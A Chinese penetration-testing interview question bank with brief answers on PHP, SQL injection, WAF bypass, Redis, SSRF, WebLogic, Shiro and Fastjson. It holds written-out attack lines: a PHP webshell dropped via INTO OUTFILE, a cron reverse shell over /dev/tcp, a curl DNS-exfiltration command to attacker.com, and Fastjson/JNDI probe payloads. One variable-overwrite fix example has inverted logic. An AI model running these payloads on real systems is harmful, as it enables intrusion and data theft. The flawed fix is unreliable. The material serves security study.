2025年滲透測試面試題總結-拷打題庫36(題目+回答)

網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

2025年滲透測試面試題總結-拷打題庫36

PHP代碼常見入口函數查找

PHP框架路由方法熟悉度

PHP變量覆蓋漏洞

文件包含漏洞防御

遠程文件包含(RFI)與本地文件包含(LFI)的PHP設置差異

本地文件包含路徑限制(PHP配置)

防止二次注入

最熟悉的三種Web漏洞類型

SQL注入過濾單引號繞過

MySQL報錯注入常用函數

報錯注入繞WAF

MySQL寫文件函數

INTO OUTFILE使用限制

SQL Server其他滲透方式

SSRF可用的偽協議

Redis RCE過程

Redis未授權獲取權限

/etc/passwd文件內容

二次注入修復方法

SQL注入過WAF(過濾information關鍵詞)

命令執行漏洞HTTP不出網處理

高難度滲透測試案例

SYN開放端口掃描原理

Shiro繞WAF方法

WebLogic遭遇WAF攔截的后續操作

JBoss反序列化原理

WebLogic反序列化漏洞(CVE-2017-10271)

Fastjson漏洞檢測

Fastjson漏洞回顯判斷

Fastjson高版本無回顯繞過

2025年滲透測試面試題總結-拷打題庫36

php代碼常見入口函數怎么找
有一些php的開發框架可以幫我們做一些url路由,對這些路由的方法熟悉嗎
介紹下PHP的變量覆蓋
有一個php的程序,本身就允許文件包含的操作,同時想要避免文件包含漏洞,寫代碼的時候要注意哪些
遠程文件包含和本地文件包含,這兩種涉及的php設置有什么
本地文件包含能不能通過php配置限制文件包含的路徑(不通過代碼直接通過配置項來解決)
寫代碼的時候怎么防止二次注入
講一下最熟悉的三種web漏洞類型,原理,測試方式
SQL注入過濾單引號怎么繞過
mysql報錯注入常用的函數
報錯注入繞waf
mysql寫文件的函數有哪些
into outfile使用有哪些限制
sqlserver除了sql注入外還有什么滲透的方式
ssrf可以使用的偽協議
有了解過Redis RCE的過程嗎
Redis未授權如何獲得服務器權限
/etc/passwd文件包含哪些內容
二次注入要怎么修復
sql注入過waf了解嗎,若一個sql注入過濾了information關鍵詞,怎么繞過
命令執行漏洞,http不出網有什么比較好的處理方法(發散一點說)
介紹一次難度比較高的滲透測試
syn開放鏈接原理
shiro 如何繞 waf
weblogic 如果在打站的時候,一旦遇到了 waf,第一個 payload 發過去,直接被攔截了, ip 也被 ban 了,如何進行下一步操作
jboss 反序列化原理
weblogic 反序列化原理,隨便說一個漏洞,然后說觸發原理
fastjson 怎么判斷是不是有漏洞,原理是什么
fastjson 判斷漏洞回顯是怎么判斷的,是用 dns 做回顯還是其他的協議做,為什么
fastjson 高版本,無回顯的情況,如何進行繞過,為什么可以這樣繞過

PHP代碼常見入口函數查找

  1. 入口文件定位
    • 默認入口index.phpadmin.php 等常見入口文件,通常包含路由分發邏輯。
    • 框架入口:如Laravel的public/index.php ,ThinkPHP的index.php
    • 路由配置:檢查.htaccessweb.config 中的URL重寫規則,確定請求如何映射到PHP腳本。
  2. 全局函數追蹤
    • 超全局變量$_GET$_POST$_REQUEST的參數接收點。
    • 框架路由方法:如Laravel的Route::get(),ThinkPHP的$this->display()
  3. 危險函數觸發點
    • 文件包含includerequire的參數是否可控。
    • 動態代碼執行eval()call_user_func()的調用鏈分析。

PHP框架路由方法熟悉度

  1. 路由定義方式
    • 靜態路由:如Route::get('/user', 'UserController@index')
    • 動態路由/user/{id},參數通過控制器方法接收。
    • 閉包路由:匿名函數處理請求,需檢查閉包內的邏輯安全。
  2. 路由解析漏洞
    • ThinkPHP 5.x RCE:路由參數未過濾導致代碼執行(如s=/index/\think\app/invokefunction)。
    • Laravel路由注入:動態路由參數未驗證導致路徑遍歷。
  3. 安全配置檢查
    • 中間件防護:驗證身份驗證中間件(如auth)是否覆蓋敏感路由。
    • CSRF保護:檢查路由是否豁免CSRF驗證(如VerifyCsrfToken白名單)。

PHP變量覆蓋漏洞

  1. 漏洞原理
    • extract()函數:從數組導入變量到符號表,若參數可控可覆蓋全局變量。
    • parse_str()函數:解析查詢字符串到變量,未初始化變量可被覆蓋。
    • **變量動態賦值**:如`foreach($_GET as $key => $value) { key = $value; }`。
  2. 利用場景
    • 覆蓋配置變量:如$is_admin = 0被覆蓋為1,繞過權限檢查。
    • 繞過認證邏輯:修改$_SESSION$_COOKIE中的用戶標識。
  3. 修復方案
    • 禁用危險函數:避免使用extract(),改用明確變量賦值。
    • 初始化變量:使用前對變量賦默認值,如$is_admin = isset($_POST['admin']) ? 0 : 1

文件包含漏洞防御

  1. 代碼層防御
    • 白名單限制:僅允許包含指定目錄文件(如include './lib/' . $file . '.php')。
    • 動態參數過濾:檢查文件名是否包含../或協議(如php://)。
  2. 配置層防御
    • 禁用高危協議php.ini 中設置allow_url_include=Off
    • 限制包含路徑open_basedir設置為項目目錄,阻止跨目錄訪問。
  3. 邏輯層防御
    • 文件后綴固定:拼接固定后綴(如.php),避免包含非PHP文件。
    • 文件存在性驗證:包含前檢查文件是否存在(如file_exists())。

遠程文件包含(RFI)與本地文件包含(LFI)的PHP設置差異

  1. RFI相關配置
    • allow_url_fopen:控制是否允許打開遠程文件(默認On)。
    • allow_url_include:控制是否允許包含遠程文件(默認Off)。
  2. LFI相關配置
    • open_basedir:限制文件操作范圍,但可能被繞過(如/proc/self/environ)。
    • disable_functions:禁用realpath()等函數,防止路徑解析繞過。
  3. 協議影響
    • RFI協議http://ftp://allow_url_include開啟。
    • LFI協議file://php://filteropen_basedir限制。

本地文件包含路徑限制(PHP配置)

  1. open_basedir
    • 作用:限制PHP可訪問的目錄(如open_basedir=/var/www/html)。
    • 繞過:利用/proc/self/cwd/proc/self/fd訪問其他目錄。
  2. disable_functions
    • 禁用函數:如realpath()symlink(),防止符號鏈接攻擊。
  3. 目錄權限
    • 文件所有權:確保Web用戶(如www-data)無權訪問敏感目錄(如/etc)。

防止二次注入

  1. 輸入過濾
    • 統一轉義:使用預處理語句或參數化查詢,而非手動轉義。
    • 數據類型強制:如intval()處理數字型參數。
  2. 存儲層防御
    • 數據存儲規范化:入庫前統一轉義,出庫時保持原始數據。
    • ORM框架:使用Eloquent或Doctrine,自動處理參數綁定。
  3. 代碼審計
    • 追蹤數據流:檢查數據從存儲到輸出的全流程是否一致轉義。
    • 自動化測試:通過SQLMap的--second-order參數測試二次注入點。

最熟悉的三種Web漏洞類型

  1. SQL注入
    • 原理:用戶輸入拼接至SQL語句,導致惡意查詢執行。
    • 測試' OR 1=1--測試布爾盲注,SLEEP(5)測試時間盲注。
    • 防御:預編譯語句(PDO)、輸入過濾(如preg_replace)。
  2. XSS(跨站腳本)
    • 原理:用戶輸入未轉義輸出到HTML,導致腳本執行。
    • 測試<script>alert(1)</script>測試反射型XSS。
    • 防御:輸出轉義(htmlspecialchars)、CSP策略。
  3. 文件上傳漏洞
    • 原理:未校驗文件類型/內容,上傳惡意文件(如.php)。
    • 測試:上傳.php文件,嘗試繞過MIME類型檢查。
    • 防御:白名單后綴、文件內容檢測(如exif_imagetype())。

SQL注入過濾單引號繞過

  1. 編碼繞過
    • URL編碼%27代替單引號,%2527雙重編碼繞過。
    • 十六進制編碼0x27表示單引號(如SELECT * FROM users WHERE id=0x27)。
  2. 寬字節注入
    • 原理:GBK編碼中%df%27轉為合法字符,繞過轉義('�')。
    • 利用id=1%df%27 AND 1=1--
  3. 二次注入
    • 場景:入庫時轉義,出庫時拼接導致單引號生效。
    • 測試:注冊用戶名為admin'--,后續查詢觸發注入。

MySQL報錯注入常用函數

  1. updatexml()
    • 用法updatexml(1,concat(0x7e,(SELECT user())),1),利用XPath錯誤回顯數據。
  2. extractvalue()
    • 用法extractvalue(1,concat(0x7e,(SELECT database()))),原理類似updatexml
  3. floor()
    • 用法:通過COUNT()GROUP BY觸發主鍵重復錯誤(如SELECT COUNT(*),CONCAT((SELECT user()),0x7e,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x)。

報錯注入繞WAF

  1. 函數替換
    • 替代函數:用exp()代替updatexml()(如exp(~(SELECT * FROM (SELECT user())a)))。
  2. 分塊傳輸
    • HTTP分塊:將請求拆分為多個塊,繞過WAF正則檢測。
  3. 注釋混淆
    • 內聯注釋/*!50000SELECT*/繞過黑名單過濾。

MySQL寫文件函數

  1. INTO OUTFILE
    • 用法SELECT '<?php eval($_POST[1]);?>' INTO OUTFILE '/var/www/shell.php'
  2. DUMPFILE
    • 特點:寫入二進制文件(如圖片、二進制后門)。
  3. SELECT ... INTO變量
    • 限制:需secure_file_priv為空,且MySQL有寫權限。

INTO OUTFILE使用限制

  1. 權限限制
    • MySQL用戶權限:需具備FILE權限,且secure_file_privNULL
  2. 路徑限制
    • secure_file_priv:若設置為/tmp,則只能寫入該目錄。
  3. 文件覆蓋
    • 文件存在性:若目標文件已存在,寫入會失敗。

SQL Server其他滲透方式

  1. xp_cmdshell
    • 利用:啟用并執行系統命令(如EXEC xp_cmdshell 'whoami')。
  2. 鏈接服務器攻擊
    • 橫向移動:通過OPENROWSET訪問其他數據庫服務器。
  3. CLR集成
    • 自定義程序集:加載惡意.NET程序執行系統命令。

SSRF可用的偽協議

  1. file://
    • 利用:讀取本地文件(如file:///etc/passwd)。
  2. dict://
    • 利用:探測端口服務(如dict://127.0.0.1:6379/info)。
  3. gopher://
    • 利用:構造HTTP請求攻擊內網服務(如Redis未授權訪問)。

Redis RCE過程

  1. 寫入SSH公鑰
    • 步驟:通過config set dir設置目錄,set寫入公鑰到authorized_keys
  2. Web目錄寫Shell
    • 步驟:設置目錄為Web根路徑,寫入PHP后門。
  3. 主從復制利用
    • 步驟:偽造惡意Redis主節點,同步惡意模塊(如.so文件)。

Redis未授權獲取權限

  1. 信息泄露
    • 執行命令INFO獲取服務器信息,KEYS *遍歷數據庫鍵。
  2. 寫定時任務
    • 步驟config set dir /var/spool/cron,寫入*/1 * * * * bash -i >& /dev/tcp/ip/port 0>&1
  3. Lua沙箱繞過
    • 利用CVE:如CVE-2022-0543(Debian特定漏洞)執行系統命令。

/etc/passwd文件內容

  1. 用戶賬戶信息
    • 格式username:x:UID:GID:description:/home/dir:/bin/bash
  2. 特殊用戶
    • root:UID=0,擁有最高權限。
    • 服務賬戶:如mysqlwww-data,無登錄Shell。

二次注入修復方法

  1. 數據存儲規范化
    • 轉義存儲:入庫時對特殊字符轉義(如addslashes())。
  2. 輸出上下文轉義
    • 動態轉義:根據輸出位置(HTML、SQL、JSON)使用不同轉義方法。
  3. ORM框架使用
    • 參數化查詢:避免手動拼接SQL,如使用Eloquent的where()方法。

SQL注入過WAF(過濾information關鍵詞)

  1. 大小寫混淆
    • 繞過InFoRmaTiOn_schema.tables
  2. 注釋分割
    • 繞過infoorrmation/**/_schema
  3. 等價替換
    • 替代表:使用mysql.innodb_table_stats 代替information_schema

命令執行漏洞HTTP不出網處理

  1. DNS外帶數據
    • 利用curl http://$(whoami).attacker.com
  2. ICMP隧道
    • 工具:使用icmpshping -p攜帶數據。
  3. 日志寫入
    • 步驟:將命令結果寫入Web日志,通過訪問日志讀取。

高難度滲透測試案例

  1. 目標環境
    • 場景:某金融系統,具備WAF、IDS、多因素認證。
  2. 突破路徑
    • 釣魚攻擊:偽造登錄頁竊取OTP,繞過多因素認證。
    • WAF繞過:分塊傳輸+注釋混淆繞過SQL注入檢測。
  3. 內網橫向
    • 利用漏洞:通過Exchange SSRF(CVE-2021-26855)進入內網。

SYN開放端口掃描原理

  1. 三次握手
    • SYN掃描:發送SYN包,若收到SYN-ACK則認為端口開放,不完成握手(RST終止)。
  2. 隱蔽性
    • 無連接記錄:半開放掃描不建立完整連接,日志中不易被發現。
  3. 工具實現
    • Nmap命令nmap -sS 192.168.1.1

Shiro繞WAF方法

  1. 密鑰爆破
    • 原理:Shiro硬編碼密鑰,使用已知密鑰生成惡意RememberMe Cookie。
  2. 加密模式繞過
    • AES-CBC:利用Padding Oracle攻擊解密或加密惡意序列化數據。
  3. 流量混淆
    • HTTP頭偽裝:將Cookie拆分到多個頭字段,繞過正則匹配。

WebLogic遭遇WAF攔截的后續操作

  1. 流量分析
    • 捕獲特征:分析WAF攔截規則(如User-Agent、Payload長度)。
  2. 協議轉換
    • HTTP/HTTPS切換:嘗試HTTPS繞過明文檢測。
  3. 延遲與分塊
    • 慢速攻擊:降低發包速率,繞過頻率檢測。
    • 分塊傳輸:拆解Payload為多個塊,繞過正則匹配。

JBoss反序列化原理

  1. JMXInvokerServlet
    • 漏洞點:未授權訪問/invoker/JMXInvokerServlet,接收序列化數據。
  2. 利用鏈
    • 庫依賴org.jboss.invocation.MarshalledValue 觸發Gadget鏈。
  3. 修復方案
    • 刪除Servlet:移除invoker目錄或配置訪問控制。

WebLogic反序列化漏洞(CVE-2017-10271)

  1. 漏洞原理
    • XML解析wls-wsat組件接收惡意XML數據,觸發WorkContext反序列化。
  2. 利用鏈
    • Gadget鏈:利用com.sun.rowset.JdbcRowSetImpl 觸發JNDI注入。
  3. 防御措施
    • 刪除組件:移除wls-wsat相關文件,或限制訪問IP。

Fastjson漏洞檢測

  1. 版本識別
    • 響應頭特征X-Serialized-Json頭或異常錯誤信息。
  2. DNS探測
    • Payload{"@type":"java.net.Inet4Address","val":"dnslog.cn"}
  3. 報錯回顯
    • 觸發異常:構造不存在的類名,觀察是否暴露類路徑信息。

Fastjson漏洞回顯判斷

  1. DNSLog
    • 原理:利用JNDI加載遠程類觸發DNS查詢(如ldap://dnslog.cn/exp )。
  2. HTTP請求
    • 回顯:通過java.net.URL 類發起HTTP請求攜帶數據。
  3. 延遲檢測
    • 時間盲注:構造Thread.sleep() 判斷是否存在漏洞。

Fastjson高版本無回顯繞過

  1. 內存馬注入
    • 利用鏈:結合Tomcat Filter/Servlet注入內存Shell。
  2. 本地文件寫入
    • 寫Web目錄:通過java.io.FileWriter 寫入JSP后門。
  3. 異步線程加載
    • 延遲觸發:利用java.util.TimerTask 延遲執行惡意代碼繞過檢測。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/79448.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/79448.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/79448.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

STL之vector容器

vector的介紹 1.vector是可變大小數組的容器 2.像數組一樣&#xff0c;采用連續的空間存儲&#xff0c;也就意味著可以通過下標去訪問&#xff0c;但它的大小可以動態改變 3.每次的插入都要開空間嗎&#xff1f;開空間就要意味著先開臨時空間&#xff0c;然后在拷貝舊的到新…

[學成在線]22-自動部署項目

自動部署 實戰流程 下邊使用jenkins實現CI/CD的流程。 1、將代碼使用Git托管 2、在jenkins創建任務&#xff0c;從Git拉取代碼。 3、拉取代碼后進行自動構建&#xff1a;測試、打包、部署。 首先將代碼打成鏡像包上傳到docker私服。 自動創建容器、啟動容器。 4、當有代…

74HC123的電路應用場景

74HC123的電路應用場景 **1. 引腳功能示例****2. 核心功能****&#xff08;1&#xff09;單穩態觸發器****&#xff08;2&#xff09;雙獨立通道****&#xff08;3&#xff09;靈活觸發方式** **3. 工作原理****4. 典型應用場景****&#xff08;1&#xff09;定時與延時控制***…

【人工智能】大模型安全的深度剖析:DeepSeek漏洞分析與防護實踐

《Python OpenCV從菜鳥到高手》帶你進入圖像處理與計算機視覺的大門! 解鎖Python編程的無限可能:《奇妙的Python》帶你漫游代碼世界 隨著大語言模型(LLM)的廣泛應用,其安全性問題日益凸顯。DeepSeek作為中國領先的開源AI模型,以低成本和高性能著稱,但近期暴露的數據庫…

《ESP32音頻開發實戰:I2S協議解析與WAV音頻錄制/播放全指南》

前言 在智能硬件和物聯網應用中&#xff0c;音頻處理能力正成為越來越重要的功能——無論是語音交互、環境音采集&#xff0c;還是音樂播放&#xff0c;都離不開高效的音頻數據傳輸與處理。而I2S&#xff08;Inter-IC Sound&#xff09;作為專為音頻設計的通信協議&#xff0c…

大數據實時數倉的數據質量監控解決方案

實時數倉不僅僅是傳統數據倉庫的升級版,它更強調數據的實時性、流動性和高可用性,通過對海量數據的即時處理和分析,為企業提供近乎實時的洞察力。這種能力在金融、零售、制造、互聯網等行業中尤為關鍵,例如,電商平臺可以通過實時數倉監控用戶行為,動態調整推薦算法;金融…

56認知干貨:智能化產業

如果在不久的未來,一座高樓大廈的建設,只需將圖紙輸入系統,無數臺機器人就能精準協作完成任務; 電影節的主角不再是人類,動漫與影視作品將不再需要人類創作; 當播種和收獲的工作無人參與,所有過程都能自動化進行; 這將預示著我們將迎來一個智能化社會,在這個社會中,…

使用synchronized關鍵字同步Java線程

問題 在Java多線程編程中&#xff0c;你需要保護某些數據&#xff0c;防止多個線程同時訪問導致數據不一致或程序錯誤。 解決方案 在需要保護的方法或代碼段上使用synchronized關鍵字。 討論 synchronized關鍵字是Java提供的同步機制&#xff0c;用于確保在同一時刻只有一…

MATLAB基于格拉姆角場與2DCNN-BiGRU的軸承故障診斷模型

本博客來源于CSDN機器魚&#xff0c;未同意任何人轉載。 更多內容&#xff0c;歡迎點擊本專欄目錄&#xff0c;查看更多內容。 目錄 0 引言 1 格拉姆角場原理 2 2DCNN-BiGRU網絡結構 3 應用實例 3.1 數據準備 3.2 格拉姆角場數據提取 3.3 網絡模型搭建-重中之重 3.4 …

電氣設備器件選型參數---斷路器

斷路器 一、基本電氣參數 額定電壓&#xff08;Ue&#xff09; 必須≥系統最高工作電壓&#xff08;如380V、660V等&#xff09;。 注意直流/交流系統的區別&#xff0c;直流斷路器需專門設計。 額定電流&#xff08;In&#xff09; 根據負載的持續工作電流選擇&#xff0c;…

Linux常用命令30——groupadd創建新的用戶組

在使用Linux或macOS日常開發中&#xff0c;熟悉一些基本的命令有助于提高工作效率&#xff0c;groupadd命令的功能是創建新的用戶組。每個用戶在創建時都有一個與其同名的基本組&#xff0c;后期可以使用groupadd命令創建出新的用戶組信息&#xff0c;讓多個用戶加入指定的擴展…

微信小程序 自定義組件 標簽管理

環境 小程序環境&#xff1a; 微信開發者工具&#xff1a;RC 1.06.2503281 win32-x64 基礎運行庫&#xff1a;3.8.1 概述 基礎功能 標簽增刪改查&#xff1a;支持添加/刪除單個標簽、批量刪除、重置默認標簽 數據展示&#xff1a;通過對話框展示結構化數據并支持復制 動…

wpf CommandParameter 傳遞MouseWheelEventArgs參數 ,用 MvvmLight 實現

在 WPF 中使用 MVVM Light 框架傳遞 MouseWheelEventArgs 參數至 CommandParameter,可通過以下步驟實現: ?1. XAML 中配置事件綁定? 在控件上通過 EventToCommand 綁定鼠標滾輪事件,并啟用 PassEventArgsToCommand 屬性以傳遞事件參數: <!-- 命名空間聲明 --> x…

vmware diffy配置ollama 本機ip無法訪問

防火墻直接關閉 本地測試&#xff0c;給它直接關了 ollama配置 vim /etc/systemd/system/ollama.service這是的配置 [Unit] DescriptionOllama Service Afternetwork-online.target[Service] Environment"OLLAMA_HOST0.0.0.0:11434" #Environment"OLLAMA_OR…

React--》掌握react構建拖拽交互的技巧

在這篇文章中將深入探討如何使用react-dnd&#xff0c;從基礎的拖拽操作到更復雜的自定義功能帶你一步步走向實現流暢、可控且用戶友好的拖拽體驗,無論你是剛接觸拖拽功能的初學者還是想要精細化拖拽交互的經驗開發者&#xff0c;都能從中找到適合自己的靈感和解決方案。 目錄 …

數據結構與算法:回溯

回溯 先給出一些leetcode算法題&#xff0c;以后遇見了相關題目再往上增加 主要參考代碼隨想錄 2.1、組合問題 關于去重&#xff1a;兩種寫法的性能分析 需要注意的是&#xff1a;使用set去重的版本相對于used數組的版本效率都要低很多&#xff0c;大家在leetcode上提交&#x…

iview 分頁改變每頁條數時請求兩次問題

問題 在iview page分頁的時候&#xff0c;修改每頁條數時&#xff0c;會發出兩次請求。 iview 版本是4.0.0 原因 iview 的分頁在調用on-page-size-change之前會調用on-Change。默認會先調用on-Change回到第一頁&#xff0c;再調用on-page-size-change改變分頁顯示數量 此時就會…

一周學會Pandas2 Python數據處理與分析-Pandas2復雜數據查詢操作

鋒哥原創的Pandas2 Python數據處理與分析 視頻教程&#xff1a; 2025版 Pandas2 Python數據處理與分析 視頻教程(無廢話版) 玩命更新中~_嗶哩嗶哩_bilibili 前面我們學了.loc[]等幾個簡單的數據篩選操作&#xff0c;但實際業務需求往 往需要按照一定的條件甚至復雜的組合條件…

【Vue bug】:deep()失效

vue 組件中使用了 element-plus 組件 <template><el-dialog:model-value"visible":title"title":width"width px":before-close"onClose"><div class"container" :style"{height:height px}"&g…

Trae 安裝第三方插件支持本地部署的大語言模型

Trae 安裝第三方插件支持本地部署的大語言模型 0. 引言1. 安裝插件 0. 引言 字節發布的 Trae IDE 一直不支持本地部署的的大語言模型。 Qwen3 剛剛發布&#xff0c;想在 Trae 中使用本地部署的 Qwen3&#xff0c;我們可以在 Trae 中安裝其他插件。 1. 安裝插件 我們可以安裝…